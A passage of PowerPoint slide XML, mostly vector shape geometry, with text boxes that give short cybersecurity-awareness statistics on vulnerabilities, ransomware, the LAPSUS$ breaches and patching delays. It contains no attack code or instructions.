            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4791284" y="2507841"/>
            <a:ext cx="2517883" cy="3616876"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 206 w 400"/>
              <a:gd name="T1" fmla="*/ 577 h 577"/>
              <a:gd name="T2" fmla="*/ 206 w 400"/>
              <a:gd name="T3" fmla="*/ 577 h 577"/>
              <a:gd name="T4" fmla="*/ 279 w 400"/>
              <a:gd name="T5" fmla="*/ 471 h 577"/>
              <a:gd name="T6" fmla="*/ 278 w 400"/>
              <a:gd name="T7" fmla="*/ 471 h 577"/>
              <a:gd name="T8" fmla="*/ 306 w 400"/>
              <a:gd name="T9" fmla="*/ 430 h 577"/>
              <a:gd name="T10" fmla="*/ 400 w 400"/>
              <a:gd name="T11" fmla="*/ 200 h 577"/>
              <a:gd name="T12" fmla="*/ 200 w 400"/>
              <a:gd name="T13" fmla="*/ 0 h 577"/>
              <a:gd name="T14" fmla="*/ 0 w 400"/>
              <a:gd name="T15" fmla="*/ 200 h 577"/>
              <a:gd name="T16" fmla="*/ 94 w 400"/>
              <a:gd name="T17" fmla="*/ 430 h 577"/>
              <a:gd name="T18" fmla="*/ 122 w 400"/>
              <a:gd name="T19" fmla="*/ 471 h 577"/>
              <a:gd name="T20" fmla="*/ 121 w 400"/>
              <a:gd name="T21" fmla="*/ 471 h 577"/>
              <a:gd name="T22" fmla="*/ 279 w 400"/>
              <a:gd name="T23" fmla="*/ 498 h 577"/>
              <a:gd name="T24" fmla="*/ 279 w 400"/>
              <a:gd name="T25" fmla="*/ 498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0" h="577">
                <a:moveTo>
                  <a:pt x="206" y="577"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="577"/>
                  <a:pt x="206" y="577"/>
                  <a:pt x="206" y="577"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="279" y="471"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="471"/>
                  <a:pt x="278" y="471"/>
                  <a:pt x="278" y="471"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="297" y="464"/>
                  <a:pt x="306" y="451"/>
                  <a:pt x="306" y="430"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="306" y="350"/>
                  <a:pt x="400" y="298"/>
                  <a:pt x="400" y="200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="400" y="31"/>
                  <a:pt x="258" y="0"/>
                  <a:pt x="200" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="0"/>
                  <a:pt x="0" y="31"/>
                  <a:pt x="0" y="200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="298"/>
                  <a:pt x="94" y="350"/>
                  <a:pt x="94" y="430"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="94" y="451"/>
                  <a:pt x="103" y="464"/>
                  <a:pt x="122" y="471"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="471"/>
                  <a:pt x="121" y="471"/>
                  <a:pt x="121" y="471"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="279" y="498"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="279" y="498"/>
                  <a:pt x="279" y="498"/>
                  <a:pt x="279" y="498"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Espace réservé du texte 249">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72E64D76-28F9-4E23-83F8-07442B57DC04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4898484" y="2626512"/>
            <a:ext cx="2303482" cy="3319200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1803727 w 3607454"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5200882"/>
              <a:gd name="connsiteX1" fmla="*/ 3607454 w 3607454"/>
              <a:gd name="connsiteY1" fmla="*/ 1809002 h 5200882"/>
              <a:gd name="connsiteX2" fmla="*/ 2759801 w 3607454"/>
              <a:gd name="connsiteY2" fmla="*/ 3873625 h 5200882"/>
              <a:gd name="connsiteX3" fmla="*/ 2503534 w 3607454"/>
              <a:gd name="connsiteY3" fmla="*/ 4247223 h 5200882"/>
              <a:gd name="connsiteX4" fmla="*/ 2513390 w 3607454"/>
              <a:gd name="connsiteY4" fmla="*/ 4247223 h 5200882"/>
              <a:gd name="connsiteX5" fmla="*/ 2513390 w 3607454"/>
              <a:gd name="connsiteY5" fmla="*/ 4266886 h 5200882"/>
              <a:gd name="connsiteX6" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY6" fmla="*/ 4266886 h 5200882"/>
              <a:gd name="connsiteX7" fmla="*/ 2611955 w 3607454"/>
              <a:gd name="connsiteY7" fmla="*/ 4365202 h 5200882"/>
              <a:gd name="connsiteX8" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY8" fmla="*/ 4463517 h 5200882"/>
              <a:gd name="connsiteX9" fmla="*/ 2513390 w 3607454"/>
              <a:gd name="connsiteY9" fmla="*/ 4463517 h 5200882"/>
              <a:gd name="connsiteX10" fmla="*/ 2513390 w 3607454"/>
              <a:gd name="connsiteY10" fmla="*/ 4483180 h 5200882"/>
              <a:gd name="connsiteX11" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY11" fmla="*/ 4483180 h 5200882"/>
              <a:gd name="connsiteX12" fmla="*/ 2611955 w 3607454"/>
              <a:gd name="connsiteY12" fmla="*/ 4581496 h 5200882"/>
              <a:gd name="connsiteX13" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY13" fmla="*/ 4679811 h 5200882"/>
              <a:gd name="connsiteX14" fmla="*/ 2503534 w 3607454"/>
              <a:gd name="connsiteY14" fmla="*/ 4679811 h 5200882"/>
              <a:gd name="connsiteX15" fmla="*/ 2503534 w 3607454"/>
              <a:gd name="connsiteY15" fmla="*/ 4699474 h 5200882"/>
              <a:gd name="connsiteX16" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY16" fmla="*/ 4699474 h 5200882"/>
              <a:gd name="connsiteX17" fmla="*/ 2611955 w 3607454"/>
              <a:gd name="connsiteY17" fmla="*/ 4797789 h 5200882"/>
              <a:gd name="connsiteX18" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY18" fmla="*/ 4896105 h 5200882"/>
              <a:gd name="connsiteX19" fmla="*/ 2434539 w 3607454"/>
              <a:gd name="connsiteY19" fmla="*/ 4896105 h 5200882"/>
              <a:gd name="connsiteX20" fmla="*/ 1862866 w 3607454"/>
              <a:gd name="connsiteY20" fmla="*/ 5200882 h 5200882"/>
              <a:gd name="connsiteX21" fmla="*/ 1754445 w 3607454"/>
              <a:gd name="connsiteY21" fmla="*/ 5200882 h 5200882"/>
              <a:gd name="connsiteX22" fmla="*/ 1172916 w 3607454"/>
              <a:gd name="connsiteY22" fmla="*/ 4896105 h 5200882"/>
              <a:gd name="connsiteX23" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY23" fmla="*/ 4896105 h 5200882"/>
              <a:gd name="connsiteX24" fmla="*/ 995500 w 3607454"/>
              <a:gd name="connsiteY24" fmla="*/ 4797789 h 5200882"/>
              <a:gd name="connsiteX25" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY25" fmla="*/ 4699474 h 5200882"/>
              <a:gd name="connsiteX26" fmla="*/ 1103921 w 3607454"/>
              <a:gd name="connsiteY26" fmla="*/ 4699474 h 5200882"/>
              <a:gd name="connsiteX27" fmla="*/ 1103921 w 3607454"/>
              <a:gd name="connsiteY27" fmla="*/ 4679811 h 5200882"/>
              <a:gd name="connsiteX28" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY28" fmla="*/ 4679811 h 5200882"/>
              <a:gd name="connsiteX29" fmla="*/ 995500 w 3607454"/>
              <a:gd name="connsiteY29" fmla="*/ 4581496 h 5200882"/>
              <a:gd name="connsiteX30" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY30" fmla="*/ 4483180 h 5200882"/>
              <a:gd name="connsiteX31" fmla="*/ 1094064 w 3607454"/>
              <a:gd name="connsiteY31" fmla="*/ 4483180 h 5200882"/>
              <a:gd name="connsiteX32" fmla="*/ 1094064 w 3607454"/>
              <a:gd name="connsiteY32" fmla="*/ 4463517 h 5200882"/>
              <a:gd name="connsiteX33" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY33" fmla="*/ 4463517 h 5200882"/>
              <a:gd name="connsiteX34" fmla="*/ 995500 w 3607454"/>
              <a:gd name="connsiteY34" fmla="*/ 4365202 h 5200882"/>
              <a:gd name="connsiteX35" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY35" fmla="*/ 4266886 h 5200882"/>
              <a:gd name="connsiteX36" fmla="*/ 1094064 w 3607454"/>
              <a:gd name="connsiteY36" fmla="*/ 4266886 h 5200882"/>
              <a:gd name="connsiteX37" fmla="*/ 1094064 w 3607454"/>
              <a:gd name="connsiteY37" fmla="*/ 4247223 h 5200882"/>
              <a:gd name="connsiteX38" fmla="*/ 1103921 w 3607454"/>
              <a:gd name="connsiteY38" fmla="*/ 4247223 h 5200882"/>
              <a:gd name="connsiteX39" fmla="*/ 847653 w 3607454"/>
              <a:gd name="connsiteY39" fmla="*/ 3873625 h 5200882"/>
              <a:gd name="connsiteX40" fmla="*/ 0 w 3607454"/>
              <a:gd name="connsiteY40" fmla="*/ 1809002 h 5200882"/>
              <a:gd name="connsiteX41" fmla="*/ 1803727 w 3607454"/>
              <a:gd name="connsiteY41" fmla="*/ 0 h 520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607454" h="5200882">
                <a:moveTo>
                  <a:pt x="1803727" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2335974" y="0"/>
                  <a:pt x="3607454" y="285115"/>
                  <a:pt x="3607454" y="1809002"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3607454" y="2684009"/>
                  <a:pt x="2759801" y="3155923"/>
                  <a:pt x="2759801" y="3873625"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2759801" y="4070256"/>
                  <a:pt x="2680949" y="4178402"/>
                  <a:pt x="2503534" y="4247223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2503534" y="4247223"/>
                  <a:pt x="2503534" y="4247223"/>
                  <a:pt x="2513390" y="4247223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2513390" y="4247223"/>
                  <a:pt x="2513390" y="4247223"/>
                  <a:pt x="2513390" y="4266886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2513390" y="4266886"/>
                  <a:pt x="2513390" y="4266886"/>
                  <a:pt x="2523247" y="4266886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2572529" y="4266886"/>
                  <a:pt x="2611955" y="4316044"/>
                  <a:pt x="2611955" y="4365202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2611955" y="4424191"/>
                  <a:pt x="2572529" y="4463517"/>
                  <a:pt x="2523247" y="4463517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2523247" y="4463517"/>
                  <a:pt x="2523247" y="4463517"/>
                  <a:pt x="2513390" y="4463517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2513390" y="4463517"/>
                  <a:pt x="2513390" y="4463517"/>
                  <a:pt x="2513390" y="4483180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2513390" y="4483180"/>
                  <a:pt x="2513390" y="4483180"/>
                  <a:pt x="2523247" y="4483180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2572529" y="4483180"/>
                  <a:pt x="2611955" y="4532338"/>
                  <a:pt x="2611955" y="4581496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2611955" y="4640485"/>
                  <a:pt x="2572529" y="4679811"/>
                  <a:pt x="2523247" y="4679811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2523247" y="4679811"/>
                  <a:pt x="2523247" y="4679811"/>
                  <a:pt x="2503534" y="4679811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2503534" y="4689642"/>
                  <a:pt x="2503534" y="4699474"/>
                  <a:pt x="2503534" y="4699474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2503534" y="4699474"/>
                  <a:pt x="2503534" y="4699474"/>
                  <a:pt x="2523247" y="4699474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2572529" y="4699474"/>
                  <a:pt x="2611955" y="4748632"/>
                  <a:pt x="2611955" y="4797789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2611955" y="4846947"/>
                  <a:pt x="2572529" y="4896105"/>
                  <a:pt x="2523247" y="4896105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2523247" y="4896105"/>
                  <a:pt x="2523247" y="4896105"/>
                  <a:pt x="2434539" y="4896105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2326118" y="5073072"/>
                  <a:pt x="2109277" y="5200882"/>
                  <a:pt x="1862866" y="5200882"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1862866" y="5200882"/>
                  <a:pt x="1862866" y="5200882"/>
                  <a:pt x="1754445" y="5200882"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1498178" y="5200882"/>
                  <a:pt x="1291193" y="5073072"/>
                  <a:pt x="1172916" y="4896105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1172916" y="4896105"/>
                  <a:pt x="1172916" y="4896105"/>
                  <a:pt x="1084208" y="4896105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1034926" y="4896105"/>
                  <a:pt x="995500" y="4846947"/>
                  <a:pt x="995500" y="4797789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="995500" y="4748632"/>
                  <a:pt x="1034926" y="4699474"/>
                  <a:pt x="1084208" y="4699474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1084208" y="4699474"/>
                  <a:pt x="1084208" y="4699474"/>
                  <a:pt x="1103921" y="4699474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1103921" y="4699474"/>
                  <a:pt x="1103921" y="4689642"/>
                  <a:pt x="1103921" y="4679811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1103921" y="4679811"/>
                  <a:pt x="1103921" y="4679811"/>
                  <a:pt x="1084208" y="4679811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1034926" y="4679811"/>
                  <a:pt x="995500" y="4640485"/>
                  <a:pt x="995500" y="4581496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="995500" y="4532338"/>
                  <a:pt x="1034926" y="4483180"/>
                  <a:pt x="1084208" y="4483180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1084208" y="4483180"/>
                  <a:pt x="1084208" y="4483180"/>
                  <a:pt x="1094064" y="4483180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094064" y="4483180"/>
                  <a:pt x="1094064" y="4483180"/>
                  <a:pt x="1094064" y="4463517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094064" y="4463517"/>
                  <a:pt x="1094064" y="4463517"/>
                  <a:pt x="1084208" y="4463517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1034926" y="4463517"/>
                  <a:pt x="995500" y="4424191"/>
                  <a:pt x="995500" y="4365202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="995500" y="4316044"/>
                  <a:pt x="1034926" y="4266886"/>
                  <a:pt x="1084208" y="4266886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1084208" y="4266886"/>
                  <a:pt x="1084208" y="4266886"/>
                  <a:pt x="1094064" y="4266886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094064" y="4266886"/>
                  <a:pt x="1094064" y="4266886"/>
                  <a:pt x="1094064" y="4247223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094064" y="4247223"/>
                  <a:pt x="1094064" y="4247223"/>
                  <a:pt x="1103921" y="4247223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="926505" y="4178402"/>
                  <a:pt x="847653" y="4070256"/>
                  <a:pt x="847653" y="3873625"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="847653" y="3155923"/>
                  <a:pt x="0" y="2684009"/>
                  <a:pt x="0" y="1809002"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="285115"/>
                  <a:pt x="1281336" y="0"/>
                  <a:pt x="1803727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vert="horz" wrap="square" lIns="288000" tIns="180000" rIns="288000" bIns="108000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38163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00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nb-NO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Over 18 000 criticital vulnerabilities reported in 2021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2D9BEB54-5336-45DC-9EDA-B35018181D4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959538" y="1545755"/>
            <a:ext cx="2340000" cy="10800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12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1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8163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00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nb-NO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80 % of all ransomware aimed at end-users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Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F9A3FA2-02E0-43CD-8AC0-6B9BF8CE9AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012438" y="3255245"/>
            <a:ext cx="2340000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1200" b="0" kern="1200" cap="all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1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8163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00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nb-NO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$LAPSUS «hacked» Samsung, NVIDIA, Microsoft og Okta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2311BE9-ABDC-487A-B254-B8243AF42FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9181492" y="1764579"/>
            <a:ext cx="2340000" cy="10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12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1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8163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00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nb-NO" altLang="en-US" sz="1600" b="1" cap="none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Ransomware attack «attempts» every 11 seconds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BE561EE0-1FB7-4673-A34E-F0C457777434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9218701" y="3127283"/>
            <a:ext cx="2340000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1200" b="0" kern="1200" cap="all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1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8163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00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nb-NO" altLang="en-US" sz="1600" b="1" cap="non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Crititical Vulnerabilities slike PrintNightmare, new RPC CVE and browsers (w/Extensions)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4B6C34E4-0A54-4324-A60D-C0565777B745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9184955" y="4898620"/>
            <a:ext cx="2340000" cy="10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12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1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8163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00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nb-NO" sz="1600" b="1" cap="none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average 30 – 60 days to patch in an organization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6A03B9-54AD-4173-A86B-30853780E29A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5534266" y="5335299"/>
            <a:ext cx="1031919" cy="608832"/>
            <a:chOff x="5470258" y="5467556"/>
            <a:chExt cx="1031919" cy="608832"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Line 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174E2701-190D-42D0-B807-A5DF3A7B2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6217" y="5741015"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line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4" name="Line 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9071105C-E5D4-46DE-A25D-815AA6FB3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6217" y="5741015"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line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5" name="Line 95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1EFF307-3954-4357-BBEC-E54E4DF37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6217" y="5761653"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line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6" name="Line 96">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D31B3D20-3D96-414C-B32B-F68FDE7EC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6217" y="5761653"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line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7" name="Freeform 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{087BFBD4-F18E-4D87-A57C-988C24B4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173" y="5467556"/>
              <a:ext cx="908089" cy="608832"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 144"/>
                <a:gd name="T1" fmla="*/ 0 h 97"/>
                <a:gd name="T2" fmla="*/ 0 w 144"/>
                <a:gd name="T3" fmla="*/ 2 h 97"/>
                <a:gd name="T4" fmla="*/ 0 w 144"/>
                <a:gd name="T5" fmla="*/ 22 h 97"/>
                <a:gd name="T6" fmla="*/ 0 w 144"/>
                <a:gd name="T7" fmla="*/ 24 h 97"/>
                <a:gd name="T8" fmla="*/ 0 w 144"/>
                <a:gd name="T9" fmla="*/ 44 h 97"/>
                <a:gd name="T10" fmla="*/ 1 w 144"/>
                <a:gd name="T11" fmla="*/ 44 h 97"/>
                <a:gd name="T12" fmla="*/ 1 w 144"/>
                <a:gd name="T13" fmla="*/ 46 h 97"/>
                <a:gd name="T14" fmla="*/ 0 w 144"/>
                <a:gd name="T15" fmla="*/ 46 h 97"/>
                <a:gd name="T16" fmla="*/ 0 w 144"/>
                <a:gd name="T17" fmla="*/ 66 h 97"/>
                <a:gd name="T18" fmla="*/ 8 w 144"/>
                <a:gd name="T19" fmla="*/ 66 h 97"/>
                <a:gd name="T20" fmla="*/ 67 w 144"/>
                <a:gd name="T21" fmla="*/ 97 h 97"/>
                <a:gd name="T22" fmla="*/ 78 w 144"/>
                <a:gd name="T23" fmla="*/ 97 h 97"/>
                <a:gd name="T24" fmla="*/ 136 w 144"/>
                <a:gd name="T25" fmla="*/ 66 h 97"/>
                <a:gd name="T26" fmla="*/ 144 w 144"/>
                <a:gd name="T27" fmla="*/ 66 h 97"/>
                <a:gd name="T28" fmla="*/ 144 w 144"/>
                <a:gd name="T29" fmla="*/ 46 h 97"/>
                <a:gd name="T30" fmla="*/ 143 w 144"/>
                <a:gd name="T31" fmla="*/ 46 h 97"/>
                <a:gd name="T32" fmla="*/ 143 w 144"/>
                <a:gd name="T33" fmla="*/ 44 h 97"/>
                <a:gd name="T34" fmla="*/ 144 w 144"/>
                <a:gd name="T35" fmla="*/ 44 h 97"/>
                <a:gd name="T36" fmla="*/ 144 w 144"/>
                <a:gd name="T37" fmla="*/ 24 h 97"/>
                <a:gd name="T38" fmla="*/ 144 w 144"/>
                <a:gd name="T39" fmla="*/ 22 h 97"/>
                <a:gd name="T40" fmla="*/ 144 w 144"/>
                <a:gd name="T41" fmla="*/ 2 h 97"/>
                <a:gd name="T42" fmla="*/ 144 w 144"/>
                <a:gd name="T43" fmla="*/ 0 h 97"/>
                <a:gd name="T44" fmla="*/ 143 w 144"/>
                <a:gd name="T45" fmla="*/ 0 h 97"/>
                <a:gd name="T46" fmla="*/ 1 w 144"/>
                <a:gd name="T47" fmla="*/ 0 h 97"/>
                <a:gd name="T48" fmla="*/ 0 w 144"/>
                <a:gd name="T4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97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6"/>
                    <a:pt x="1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20" y="84"/>
                    <a:pt x="41" y="97"/>
                    <a:pt x="67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103" y="97"/>
                    <a:pt x="125" y="84"/>
                    <a:pt x="136" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="66"/>
                    <a:pt x="144" y="66"/>
                    <a:pt x="144" y="66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3" y="46"/>
                    <a:pt x="143" y="46"/>
                    <a:pt x="143" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="46"/>
                    <a:pt x="143" y="45"/>
                    <a:pt x="143" y="44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8" name="Freeform 99">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382E562C-ED58-4281-8611-FFA53358F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0258" y="5477875"/>
              <a:ext cx="1031919" cy="123831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 164"/>
                <a:gd name="T1" fmla="*/ 20 h 20"/>
                <a:gd name="T2" fmla="*/ 164 w 164"/>
                <a:gd name="T3" fmla="*/ 10 h 20"/>
                <a:gd name="T4" fmla="*/ 155 w 164"/>
                <a:gd name="T5" fmla="*/ 0 h 20"/>
                <a:gd name="T6" fmla="*/ 154 w 164"/>
                <a:gd name="T7" fmla="*/ 0 h 20"/>
                <a:gd name="T8" fmla="*/ 10 w 164"/>
                <a:gd name="T9" fmla="*/ 0 h 20"/>
                <a:gd name="T10" fmla="*/ 9 w 164"/>
                <a:gd name="T11" fmla="*/ 0 h 20"/>
                <a:gd name="T12" fmla="*/ 0 w 164"/>
                <a:gd name="T13" fmla="*/ 10 h 20"/>
                <a:gd name="T14" fmla="*/ 9 w 164"/>
                <a:gd name="T15" fmla="*/ 20 h 20"/>
                <a:gd name="T16" fmla="*/ 10 w 164"/>
                <a:gd name="T17" fmla="*/ 20 h 20"/>
                <a:gd name="T18" fmla="*/ 154 w 164"/>
                <a:gd name="T19" fmla="*/ 20 h 20"/>
                <a:gd name="T20" fmla="*/ 155 w 164"/>
                <a:gd name="T2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0">
                  <a:moveTo>
                    <a:pt x="155" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="20"/>
                    <a:pt x="164" y="16"/>
                    <a:pt x="164" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="5"/>
                    <a:pt x="160" y="0"/>
                    <a:pt x="155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9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54" y="20"/>
                    <a:pt x="154" y="20"/>
                    <a:pt x="154" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155" y="20"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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9" name="Freeform 100">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A21F97-6189-4FB4-B6DB-2706C70FB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0258" y="5617185"/>
              <a:ext cx="1031919" cy="123831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 164 w 164"/>
                <a:gd name="T1" fmla="*/ 10 h 20"/>
                <a:gd name="T2" fmla="*/ 155 w 164"/>
